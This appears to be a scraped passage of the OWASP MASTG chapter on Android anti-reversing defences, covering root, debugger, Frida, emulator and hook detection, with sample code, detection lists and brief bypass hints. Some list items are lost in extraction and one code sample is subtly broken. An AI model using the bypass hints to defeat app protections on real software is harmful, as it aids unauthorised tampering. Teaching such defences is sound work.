{ \n\u00a0 \u00a0\"requestDetails\": { \n\u00a0 \u00a0 \u00a0\"requestPackageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"timestampMillis\": \"1666025823025\", \n\u00a0 \u00a0 \u00a0\"nonce\": \"kx7QEkGebwQfBalJ4...Xwjhak7o3uHDDQTTqI\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"appIntegrity\": { \n\u00a0 \u00a0 \u00a0\"appRecognitionVerdict\": \"UNRECOGNIZED_VERSION\", \n\u00a0 \u00a0 \u00a0\"packageName\": \"com.example.your.package\", \n\u00a0 \u00a0 \u00a0\"certificateSha256Digest\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"vNsB0...ww1U\" \n\u00a0 \u00a0 \u00a0], \n\u00a0 \u00a0 \u00a0\"versionCode\": \"1\" \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"deviceIntegrity\": { \n\u00a0 \u00a0 \u00a0\"deviceRecognitionVerdict\": [ \n\u00a0 \u00a0 \u00a0 \u00a0\"MEETS_DEVICE_INTEGRITY\" \n\u00a0 \u00a0 \u00a0] \n\u00a0 \u00a0}, \n\u00a0 \u00a0\"accountDetails\": { \n\u00a0 \u00a0 \u00a0\"appLicensingVerdict\": \"UNEVALUATED\" \n\u00a0 \u00a0} \n\u00a0} \n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#programmatic-detection","title":"Programmatic Detection","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#file-existence-checks","title":"File existence checks","text":"Perhaps the most widely used method of programmatic detection is checking for files typically found on rooted devices, such as package files of common rooting apps and their associated files and directories, including the following:
/system/app/Superuser.apk\n/system/etc/init.d/99SuperSUDaemon\n/dev/com.koushikdutta.superuser.daemon/\n/system/xbin/daemonsu\n
Detection code also often looks for binaries that are usually installed once a device has been rooted. These searches include checking for busybox and attempting to open the su binary at different locations:
/sbin/su\n/system/bin/su\n/system/bin/failsafe/su\n/system/xbin/su\n/system/xbin/busybox\n/system/sd/xbin/su\n/data/local/su\n/data/local/xbin/su\n/data/local/bin/su\n
Checking whether su
is on the PATH also works:
public static boolean checkRoot(){\n for(String pathDir : System.getenv(\"PATH\").split(\":\")){\n if(new File(pathDir, \"su\").exists()) {\n return true;\n }\n }\n return false;\n }\n
File checks can be easily implemented in both Java and native code. The following JNI example (adapted from rootinspector) uses the stat
system call to retrieve information about a file and returns \"1\" if the file exists.
jboolean Java_com_example_statfile(JNIEnv * env, jobject this, jstring filepath) {\n jboolean fileExists = 0;\n jboolean isCopy;\n const char * path = (*env)->GetStringUTFChars(env, filepath, &isCopy);\n struct stat fileattrib;\n if (stat(path, &fileattrib) < 0) {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat error: [%s]\", strerror(errno));\n } else\n {\n __android_log_print(ANDROID_LOG_DEBUG, DEBUG_TAG, \"NATIVE: stat success, access perms: [%d]\", fileattrib.st_mode);\n return 1;\n }\n\n return 0;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#executing-su-and-other-commands","title":"Executing su
and other commands","text":"Another way of determining whether su
exists is attempting to execute it through the Runtime.getRuntime.exec
method. An IOException will be thrown if su
is not on the PATH. The same method can be used to check for other programs often found on rooted devices, such as busybox and the symbolic links that typically point to it.
SuperSU - by far the most popular rooting tool - runs an authentication daemon named daemonsu
, so the presence of this process is another sign of a rooted device. Running processes can be enumerated with the ActivityManager.getRunningAppProcesses
and manager.getRunningServices
APIs, the ps
command, and browsing through the /proc
directory. The following is an example implemented in rootinspector:
public boolean checkRunningProcesses() {\n\n boolean returnValue = false;\n\n // Get currently running application processes\n List<RunningServiceInfo> list = manager.getRunningServices(300);\n\n if(list != null){\n String tempName;\n for(int i=0;i<list.size();++i){\n tempName = list.get(i).process;\n\n if(tempName.contains(\"supersu\") || tempName.contains(\"superuser\")){\n returnValue = true;\n }\n }\n }\n return returnValue;\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-installed-app-packages","title":"Checking installed app packages","text":"You can use the Android package manager to obtain a list of installed packages. The following package names belong to popular rooting tools:
com.thirdparty.superuser\neu.chainfire.supersu\ncom.noshufou.android.su\ncom.koushikdutta.superuser\ncom.zachspong.temprootremovejb\ncom.ramdroid.appquarantine\ncom.topjohnwu.magisk\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-writable-partitions-and-system-directories","title":"Checking for writable partitions and system directories","text":"Unusual permissions on system directories may indicate a customized or rooted device. Although the system and data directories are normally mounted read-only, you'll sometimes find them mounted read-write when the device is rooted. Look for these filesystems mounted with the \"rw\" flag or try to create a file in the data directories.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#checking-for-custom-android-builds","title":"Checking for custom Android builds","text":"Checking for signs of test builds and custom ROMs is also helpful. One way to do this is to check the BUILD tag for test-keys, which normally indicate a custom Android image. Check the BUILD tag as follows:
private boolean isTestKeyBuild()\n{\nString str = Build.TAGS;\nif ((str != null) && (str.contains(\"test-keys\")));\nfor (int i = 1; ; i = 0)\n return i;\n}\n
Missing Google Over-The-Air (OTA) certificates is another sign of a custom ROM: on stock Android builds, OTA updates use Google's public certificates.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging","title":"Anti-Debugging","text":"Debugging is a highly effective way to analyze runtime app behavior. It allows the reverse engineer to step through the code, stop app execution at arbitrary points, inspect the state of variables, read and modify memory, and a lot more.
Anti-debugging features can be preventive or reactive. As the name implies, preventive anti-debugging prevents the debugger from attaching in the first place; reactive anti-debugging involves detecting debuggers and reacting to them in some way (e.g., terminating the app or triggering hidden behavior). The \"more-is-better\" rule applies: to maximize effectiveness, defenders combine multiple methods of prevention and detection that operate on different API layers and are well distributed throughout the app.
As mentioned in the \"Reverse Engineering and Tampering\" chapter, we have to deal with two debugging protocols on Android: we can debug on the Java level with JDWP or on the native layer via a ptrace-based debugger. A good anti-debugging scheme should defend against both types of debugging.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#jdwp-anti-debugging","title":"JDWP Anti-Debugging","text":"In the chapter \"Reverse Engineering and Tampering\", we talked about JDWP, the protocol used for communication between the debugger and the Java Virtual Machine. We showed that it is easy to enable debugging for any app by patching its manifest file, and changing the ro.debuggable
system property which enables debugging for all apps. Let's look at a few things developers do to detect and disable JDWP debuggers.
We have already encountered the android:debuggable
attribute. This flag in the Android Manifest determines whether the JDWP thread is started for the app. Its value can be determined programmatically, via the app's ApplicationInfo
object. If the flag is set, the manifest has been tampered with and allows debugging.
public static boolean isDebuggable(Context context){\n\n return ((context.getApplicationContext().getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0);\n\n }\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#isdebuggerconnected","title":"isDebuggerConnected","text":"While this might be pretty obvious to circumvent for a reverse engineer, you can use isDebuggerConnected
from the android.os.Debug
class to determine whether a debugger is connected.
public static boolean detectDebugger() {\n return Debug.isDebuggerConnected();\n }\n
The same API can be called via native code by accessing the DvmGlobals global structure.
JNIEXPORT jboolean JNICALL Java_com_test_debugging_DebuggerConnectedJNI(JNIenv * env, jobject obj) {\n if (gDvm.debuggerConnected || gDvm.debuggerActive)\n return JNI_TRUE;\n return JNI_FALSE;\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#timer-checks","title":"Timer Checks","text":"Debug.threadCpuTimeNanos
indicates the amount of time that the current thread has been executing code. Because debugging slows down process execution, you can use the difference in execution time to guess whether a debugger is attached.
static boolean detect_threadCpuTimeNanos(){\n long start = Debug.threadCpuTimeNanos();\n\n for(int i=0; i<1000000; ++i)\n continue;\n\n long stop = Debug.threadCpuTimeNanos();\n\n if(stop - start < 10000000) {\n return false;\n }\n else {\n return true;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#messing-with-jdwp-related-data-structures","title":"Messing with JDWP-Related Data Structures","text":"In Dalvik, the global virtual machine state is accessible via the DvmGlobals
structure. The global variable gDvm holds a pointer to this structure. DvmGlobals
contains various variables and pointers that are important for JDWP debugging and can be tampered with.
struct DvmGlobals {\n /*\n * Some options that could be worth tampering with :)\n */\n\n bool jdwpAllowed; // debugging allowed for this process?\n bool jdwpConfigured; // has debugging info been provided?\n JdwpTransportType jdwpTransport;\n bool jdwpServer;\n char* jdwpHost;\n int jdwpPort;\n bool jdwpSuspend;\n\n Thread* threadList;\n\n bool nativeDebuggerActive;\n bool debuggerConnected; /* debugger or DDMS is connected */\n bool debuggerActive; /* debugger is making requests */\n JdwpState* jdwpState;\n\n};\n
For example, setting the gDvm.methDalvikDdmcServer_dispatch function pointer to NULL crashes the JDWP thread:
JNIEXPORT jboolean JNICALL Java_poc_c_crashOnInit ( JNIEnv* env , jobject ) {\n gDvm.methDalvikDdmcServer_dispatch = NULL;\n}\n
You can disable debugging by using similar techniques in ART even though the gDvm variable is not available. The ART runtime exports some of the vtables of JDWP-related classes as global symbols (in C++, vtables are tables that hold pointers to class methods). This includes the vtables of the classes JdwpSocketState
and JdwpAdbState
, which handle JDWP connections via network sockets and ADB, respectively. You can manipulate the behavior of the debugging runtime by overwriting the method pointers in the associated vtables (archived).
One way to overwrite the method pointers is to overwrite the address of the function jdwpAdbState::ProcessIncoming
with the address of JdwpAdbState::Shutdown
. This will cause the debugger to disconnect immediately.
#include <jni.h>\n#include <string>\n#include <android/log.h>\n#include <dlfcn.h>\n#include <sys/mman.h>\n#include <jdwp/jdwp.h>\n\n#define log(FMT, ...) __android_log_print(ANDROID_LOG_VERBOSE, \"JDWPFun\", FMT, ##__VA_ARGS__)\n\n// Vtable structure. Just to make messing around with it more intuitive\n\nstruct VT_JdwpAdbState {\n unsigned long x;\n unsigned long y;\n void * JdwpSocketState_destructor;\n void * _JdwpSocketState_destructor;\n void * Accept;\n void * showmanyc;\n void * ShutDown;\n void * ProcessIncoming;\n};\n\nextern \"C\"\n\nJNIEXPORT void JNICALL Java_sg_vantagepoint_jdwptest_MainActivity_JDWPfun(\n JNIEnv *env,\n jobject /* this */) {\n\n void* lib = dlopen(\"libart.so\", RTLD_NOW);\n\n if (lib == NULL) {\n log(\"Error loading libart.so\");\n dlerror();\n }else{\n\n struct VT_JdwpAdbState *vtable = ( struct VT_JdwpAdbState *)dlsym(lib, \"_ZTVN3art4JDWP12JdwpAdbStateE\");\n\n if (vtable == 0) {\n log(\"Couldn't resolve symbol '_ZTVN3art4JDWP12JdwpAdbStateE'.\\n\");\n }else {\n\n log(\"Vtable for JdwpAdbState at: %08x\\n\", vtable);\n\n // Let the fun begin!\n\n unsigned long pagesize = sysconf(_SC_PAGE_SIZE);\n unsigned long page = (unsigned long)vtable & ~(pagesize-1);\n\n mprotect((void *)page, pagesize, PROT_READ | PROT_WRITE);\n\n vtable->ProcessIncoming = vtable->ShutDown;\n\n // Reset permissions & flush cache\n\n mprotect((void *)page, pagesize, PROT_READ);\n\n }\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#traditional-anti-debugging","title":"Traditional Anti-Debugging","text":"On Linux, the ptrace
system call is used to observe and control the execution of a process (the tracee) and to examine and change that process' memory and registers. ptrace
is the primary way to implement system call tracing and breakpoint debugging in native code. Most JDWP anti-debugging tricks (which may be safe for timer-based checks) won't catch classical debuggers based on ptrace
and therefore, many Android anti-debugging tricks include ptrace
, often exploiting the fact that only one debugger at a time can attach to a process.
When you debug an app and set a breakpoint on native code, Android Studio will copy the needed files to the target device and start the lldb-server which will use ptrace
to attach to the process. From this moment on, if you inspect the status file of the debugged process (/proc/<pid>/status
or /proc/self/status
), you will see that the \"TracerPid\" field has a value different from 0, which is a sign of debugging.
Remember that this only applies to native code. If you're debugging a Java/Kotlin-only app the value of the \"TracerPid\" field should be 0.
This technique is usually applied within the JNI native libraries in C, as shown in Google's gperftools (Google Performance Tools) Heap Checker implementation of the IsDebuggerAttached
method. However, if you prefer to include this check as part of your Java/Kotlin code you can refer to this Java implementation of the hasTracerPid
method from Tim Strazzere's Anti-Emulator project.
When trying to implement such a method yourself, you can manually check the value of TracerPid with ADB. The following listing uses Google's NDK sample app hello-jni (com.example.hellojni) to perform the check after attaching Android Studio's debugger:
$ adb shell ps -A | grep com.example.hellojni\nu0_a271 11657 573 4302108 50600 ptrace_stop 0 t com.example.hellojni\n$ adb shell cat /proc/11657/status | grep -e \"^TracerPid:\" | sed \"s/^TracerPid:\\t//\"\nTracerPid: 11839\n$ adb shell ps -A | grep 11839\nu0_a271 11839 11837 14024 4548 poll_schedule_timeout 0 S lldb-server\n
You can see how the status file of com.example.hellojni (PID=11657) contains a TracerPID of 11839, which we can identify as the lldb-server process.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#using-fork-and-ptrace","title":"Using Fork and ptrace","text":"You can prevent debugging of a process by forking a child process and attaching it to the parent as a debugger via code similar to the following simple example code:
void fork_and_attach()\n{\n int pid = fork();\n\n if (pid == 0)\n {\n int ppid = getppid();\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, NULL, 0);\n\n /* Continue the parent process */\n ptrace(PTRACE_CONT, NULL, NULL);\n }\n }\n}\n
With the child attached, further attempts to attach to the parent will fail. We can verify this by compiling the code into a JNI function and packing it into an app we run on the device.
root@android:/ # ps | grep -i anti\nu0_a151 18190 201 1535844 54908 ffffffff b6e0f124 S sg.vantagepoint.antidebug\nu0_a151 18224 18190 1495180 35824 c019a3ac b6e0ee5c S sg.vantagepoint.antidebug\n
Attempting to attach to the parent process with gdbserver fails with an error:
root@android:/ # ./gdbserver --attach localhost:12345 18190\nwarning: process 18190 is already traced by process 18224\nCannot attach to lwp 18190: Operation not permitted (1)\nExiting\n
You can easily bypass this failure, however, by killing the child and \"freeing\" the parent from being traced. You'll therefore usually find more elaborate schemes, involving multiple processes and threads as well as some form of monitoring to impede tampering. Common methods include
/proc
filesystem, such as TracerPID in /proc/pid/status
.Let's look at a simple improvement for the method above. After the initial fork
, we launch in the parent an extra thread that continually monitors the child's status. Depending on whether the app has been built in debug or release mode (which is indicated by the android:debuggable
flag in the manifest), the child process should do one of the following things:
waitpid(child_pid)
should never return. If it does, something is fishy and we would kill the whole process group.The following is the complete code for implementing this improvement with a JNI function:
#include <jni.h>\n#include <unistd.h>\n#include <sys/ptrace.h>\n#include <sys/wait.h>\n#include <pthread.h>\n\nstatic int child_pid;\n\nvoid *monitor_pid() {\n\n int status;\n\n waitpid(child_pid, &status, 0);\n\n /* Child status should never change. */\n\n _exit(0); // Commit seppuku\n\n}\n\nvoid anti_debug() {\n\n child_pid = fork();\n\n if (child_pid == 0)\n {\n int ppid = getppid();\n int status;\n\n if (ptrace(PTRACE_ATTACH, ppid, NULL, NULL) == 0)\n {\n waitpid(ppid, &status, 0);\n\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n\n while (waitpid(ppid, &status, 0)) {\n\n if (WIFSTOPPED(status)) {\n ptrace(PTRACE_CONT, ppid, NULL, NULL);\n } else {\n // Process has exited\n _exit(0);\n }\n }\n }\n\n } else {\n pthread_t t;\n\n /* Start the monitoring thread */\n pthread_create(&t, NULL, monitor_pid, (void *)NULL);\n }\n}\n\nJNIEXPORT void JNICALL\nJava_sg_vantagepoint_antidebug_MainActivity_antidebug(JNIEnv *env, jobject instance) {\n\n anti_debug();\n}\n
Again, we pack this into an Android app to see if it works. Just as before, two processes show up when we run the app's debug build.
root@android:/ # ps | grep -I anti-debug\nu0_a152 20267 201 1552508 56796 ffffffff b6e0f124 S sg.vantagepoint.anti-debug\nu0_a152 20301 20267 1495192 33980 c019a3ac b6e0ee5c S sg.vantagepoint.anti-debug\n
However, if we terminate the child process at this point, the parent exits as well:
root@android:/ # kill -9 20301\n130|root@hammerhead:/ # cd /data/local/tmp\nroot@android:/ # ./gdbserver --attach localhost:12345 20267\ngdbserver: unable to open /proc file '/proc/20267/status'\nCannot attach to lwp 20267: No such file or directory (2)\nExiting\n
To bypass this, we must modify the app's behavior slightly (the easiest ways to do so are patching the call to _exit
with NOPs and hooking the function _exit
in libc.so
). At this point, we have entered the proverbial \"arms race\": implementing more intricate forms of this defense as well as bypassing it are always possible.
There are two topics related to file integrity:
SharedPreferences
should be protected.Integrity checks often calculate a checksum or hash over selected files. Commonly protected files include
The following sample implementation from the Android Cracking blog calculates a CRC over classes.dex
and compares it to the expected value.
private void crcTest() throws IOException {\n boolean modified = false;\n // required dex crc value stored as a text string.\n // it could be any invisible layout element\n long dexCrc = Long.parseLong(Main.MyContext.getString(R.string.dex_crc));\n\n ZipFile zf = new ZipFile(Main.MyContext.getPackageCodePath());\n ZipEntry ze = zf.getEntry(\"classes.dex\");\n\n if ( ze.getCrc() != dexCrc ) {\n // dex has been modified\n modified = true;\n }\n else {\n // dex not tampered with\n modified = false;\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#sample-implementation-storage","title":"Sample Implementation - Storage","text":"When providing integrity on the storage itself, you can either create an HMAC over a given key-value pair (as for the Android SharedPreferences
) or create an HMAC over a complete file that's provided by the file system.
When using an HMAC, you can use a bouncy castle implementation or the AndroidKeyStore to HMAC the given content.
Complete the following procedure when generating an HMAC with BouncyCastle:
doFinal
on the HMAC with the bytecode.Complete the following procedure when verifying the HMAC with BouncyCastle:
When generating the HMAC based on the Android Keystore, then it is best to only do this for Android 6.0 (API level 23) and higher.
The following is a convenient HMAC implementation without AndroidKeyStore
:
public enum HMACWrapper {\n HMAC_512(\"HMac-SHA512\"), //please note that this is the spec for the BC provider\n HMAC_256(\"HMac-SHA256\");\n\n private final String algorithm;\n\n private HMACWrapper(final String algorithm) {\n this.algorithm = algorithm;\n }\n\n public Mac createHMAC(final SecretKey key) {\n try {\n Mac e = Mac.getInstance(this.algorithm, \"BC\");\n SecretKeySpec secret = new SecretKeySpec(key.getKey().getEncoded(), this.algorithm);\n e.init(secret);\n return e;\n } catch (NoSuchProviderException | InvalidKeyException | NoSuchAlgorithmException e) {\n //handle them\n }\n }\n\n public byte[] hmac(byte[] message, SecretKey key) {\n Mac mac = this.createHMAC(key);\n return mac.doFinal(message);\n }\n\n public boolean verify(byte[] messageWithHMAC, SecretKey key) {\n Mac mac = this.createHMAC(key);\n byte[] checksum = extractChecksum(messageWithHMAC, mac.getMacLength());\n byte[] message = extractMessage(messageWithHMAC, mac.getMacLength());\n byte[] calculatedChecksum = this.hmac(message, key);\n int diff = checksum.length ^ calculatedChecksum.length;\n\n for (int i = 0; i < checksum.length && i < calculatedChecksum.length; ++i) {\n diff |= checksum[i] ^ calculatedChecksum[i];\n }\n\n return diff == 0;\n }\n\n public byte[] extractMessage(byte[] messageWithHMAC) {\n Mac hmac = this.createHMAC(SecretKey.newKey());\n return extractMessage(messageWithHMAC, hmac.getMacLength());\n }\n\n private static byte[] extractMessage(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] message = new byte[body.length - checksumLength];\n System.arraycopy(body, 0, message, 0, message.length);\n return message;\n } else {\n return new byte[0];\n }\n }\n\n private static byte[] extractChecksum(byte[] body, int checksumLength) {\n if (body.length >= checksumLength) {\n byte[] checksum = new byte[checksumLength];\n System.arraycopy(body, body.length - checksumLength, checksum, 0, checksumLength);\n return checksum;\n } else {\n return new 
byte[0];\n }\n }\n\n static {\n Security.addProvider(new BouncyCastleProvider());\n }\n}\n
Another way to provide integrity is to sign the byte array you obtained and add the signature to the original byte array.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detection-of-reverse-engineering-tools","title":"Detection of Reverse Engineering Tools","text":"The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a rooted device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide. Other tools, such as Substrate and Xposed, can be detected similarly. Note that DBI/injection/hooking tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
For instance, in its default configuration on a rooted device, Frida runs on the device as frida-server. When you explicitly attach to a target app (e.g. via frida-trace or the Frida REPL), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). If you check /proc/<pid>/maps
you'll find the frida-agent as frida-agent-64.so:
bullhead:/ # cat /proc/18370/maps | grep -i frida\n71b6bd6000-71b7d62000 r-xp /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7d7f000-71b7e06000 r--p /data/local/tmp/re.frida.server/frida-agent-64.so\n71b7e06000-71b7e28000 rw-p /data/local/tmp/re.frida.server/frida-agent-64.so\n
The other method (which also works for non-rooted devices) consists of embedding a frida-gadget into the APK and forcing the app to load it as one of its native libraries. If you inspect the app memory maps after starting the app (no need to attach explicitly to it) you'll find the embedded frida-gadget as libfrida-gadget.so.
bullhead:/ # cat /proc/18370/maps | grep -i frida\n\n71b865a000-71b97f1000 r-xp /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b9802000-71b988a000 r--p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n71b988a000-71b98ac000 rw-p /data/app/sg.vp.owasp_mobile.omtg_android-.../lib/arm64/libfrida-gadget.so\n
Looking at these two traces that Frida leaves behind, you might already imagine that detecting them would be a trivial task. And actually, bypassing that detection will be just as trivial. But things can get much more complicated. The following table briefly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are presented in the article \"The Jiu-Jitsu of Detecting Frida\" by Bernhard Mueller (archived). Please refer to it for more details and for example code snippets.
Method Description Discussion Checking the App Signature In order to embed the frida-gadget within the APK, it would need to be repackaged and resigned. You could check the signature of the APK when the app is starting (e.g. GET_SIGNING_CERTIFICATES since API level 28) and compare it to the one you pinned in your APK. This is unfortunately too trivial to bypass, e.g. by patching the APK or performing system call hooking. Check The Environment For Related Artifacts Artifacts can be package files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (rooted) system (the daemon responsible for exposing Frida over TCP). Inspect the running services (getRunningServices
) and processes (ps
) searching for one whose name is \"frida-server\". You could also walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names). Since Android 7.0 (API level 24), inspecting the running services/processes won't show you daemons like the frida-server as it is not being started by the app itself. Even if it would be possible, bypassing this would be as easy as just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Checking whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is a little too trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Scanning Process Memory for Known Artifacts Scan the memory for artifacts found in Frida's libraries, e.g. the string \"LIBFRIDA\" present in all versions of frida-gadget and frida-agent. For example, use Runtime.getRuntime().exec
and iterate through the memory mappings listed in /proc/self/maps
or /proc/<pid>/maps
(depending on the Android version) searching for the string. This method is a bit more effective, and it is difficult to bypass with Frida only, especially if some obfuscation has been added and if multiple artifacts are being scanned. However, the chosen artifacts might be patched in the Frida binaries. Find the source code on Bernhard Mueller's GitHub. Please remember that this table is far from exhaustive. We could start talking about named pipes (used by frida-server for external communication), detecting trampolines (indirect jump vectors inserted at the prologue of functions), which would help detecting Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker; and many other, more or less, effective detection methods. Each of them will depend on whether you're using a rooted device, the specific version of the rooting method and/or the version of the tool itself. Further, the app can try to make it harder to detect the implemented protection mechanisms by using various obfuscation techniques. At the end, this is part of the cat and mouse game of protecting data being processed on an untrusted environment (an app running in the user device).
It is important to note that these controls are only increasing the complexity of the reverse engineering process. If used, the best approach is to combine the controls cleverly instead of using them individually. However, none of them can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win! You also have to consider that integrating some of the controls into your app might increase the complexity of your app and even have an impact on its performance.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"In the context of anti-reversing, the goal of emulator detection is to increase the difficulty of running the app on an emulated device, which impedes some tools and techniques reverse engineers like to use. This increased difficulty forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
There are several indicators that the device in question is being emulated. Although all these API calls can be hooked, these indicators provide a modest first line of defense.
The first set of indicators are in the file build.prop
.
API Method Value Meaning\nBuild.ABI armeabi possibly emulator\nBUILD.ABI2 unknown possibly emulator\nBuild.BOARD unknown emulator\nBuild.Brand generic emulator\nBuild.DEVICE generic emulator\nBuild.FINGERPRINT generic emulator\nBuild.Hardware goldfish emulator\nBuild.Host android-test possibly emulator\nBuild.ID FRF91 emulator\nBuild.MANUFACTURER unknown emulator\nBuild.MODEL sdk emulator\nBuild.PRODUCT sdk emulator\nBuild.RADIO unknown possibly emulator\nBuild.SERIAL null emulator\nBuild.USER android-build emulator\n
You can edit the file build.prop
on a rooted Android device or modify it while compiling AOSP from source. Both techniques will allow you to bypass the static string checks above.
The next set of static indicators utilize the Telephony manager. All Android emulators have fixed values that this API can query.
API Value Meaning\nTelephonyManager.getDeviceId() 0's emulator\nTelephonyManager.getLine1 Number() 155552155 emulator\nTelephonyManager.getNetworkCountryIso() us possibly emulator\nTelephonyManager.getNetworkType() 3 possibly emulator\nTelephonyManager.getNetworkOperator().substring(0,3) 310 possibly emulator\nTelephonyManager.getNetworkOperator().substring(3) 260 possibly emulator\nTelephonyManager.getPhoneType() 1 possibly emulator\nTelephonyManager.getSimCountryIso() us possibly emulator\nTelephonyManager.getSimSerial Number() 89014103211118510720 emulator\nTelephonyManager.getSubscriberId() 310260000000000 emulator\nTelephonyManager.getVoiceMailNumber() 15552175049 emulator\n
Keep in mind that a hooking framework, such as Xposed or Frida, can hook this API to provide false data.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#runtime-integrity-verification","title":"Runtime Integrity Verification","text":"Controls in this category verify the integrity of the app's memory space to defend the app against memory patches applied during runtime. Such patches include unwanted changes to binary code, bytecode, function pointer tables, and important data structures, as well as rogue code loaded into process memory. Integrity can be verified by:
There's some overlap with the category \"detecting reverse engineering tools and frameworks\", and, in fact, we demonstrated the signature-based approach in that chapter when we showed how to search process memory for Frida-related strings. Below are a few more examples of various kinds of integrity monitoring.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-tampering-with-the-java-runtime","title":"Detecting Tampering with the Java Runtime","text":"This detection code is from the dead && end blog.
try {\n throw new Exception();\n}\ncatch(Exception e) {\n int zygoteInitCallCount = 0;\n for(StackTraceElement stackTraceElement : e.getStackTrace()) {\n if(stackTraceElement.getClassName().equals(\"com.android.internal.os.ZygoteInit\")) {\n zygoteInitCallCount++;\n if(zygoteInitCallCount == 2) {\n Log.wtf(\"HookDetection\", \"Substrate is active on the device.\");\n }\n }\n if(stackTraceElement.getClassName().equals(\"com.saurik.substrate.MS$2\") &&\n stackTraceElement.getMethodName().equals(\"invoked\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Substrate.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"main\")) {\n Log.wtf(\"HookDetection\", \"Xposed is active on the device.\");\n }\n if(stackTraceElement.getClassName().equals(\"de.robv.android.xposed.XposedBridge\") &&\n stackTraceElement.getMethodName().equals(\"handleHookedMethod\")) {\n Log.wtf(\"HookDetection\", \"A method on the stack trace has been hooked using Xposed.\");\n }\n\n }\n}\n
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#detecting-native-hooks","title":"Detecting Native Hooks","text":"By using ELF binaries, native function hooks can be installed by overwriting function pointers in memory (e.g., Global Offset Table or PLT hooking) or patching parts of the function code itself (inline hooking). Checking the integrity of the respective memory regions is one way to detect this kind of hook.
The Global Offset Table (GOT) is used to resolve library functions. During runtime, the dynamic linker patches this table with the absolute addresses of global symbols. GOT hooks overwrite the stored function addresses and redirect legitimate function calls to adversary-controlled code. This type of hook can be detected by enumerating the process memory map and verifying that each GOT entry points to a legitimately loaded library.
In contrast to GNU ld
, which resolves symbol addresses only after they are needed for the first time (lazy binding), the Android linker resolves all external functions and writes the respective GOT entries immediately after a library is loaded (immediate binding). You can therefore expect all GOT entries to point to valid memory locations in the code sections of their respective libraries during runtime. GOT hook detection methods usually walk the GOT and verify this.
Inline hooks work by overwriting a few instructions at the beginning or end of the function code. During runtime, this so-called trampoline redirects execution to the injected code. You can detect inline hooks by inspecting the prologues and epilogues of library functions for suspect instructions, such as far jumps to locations outside the library.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
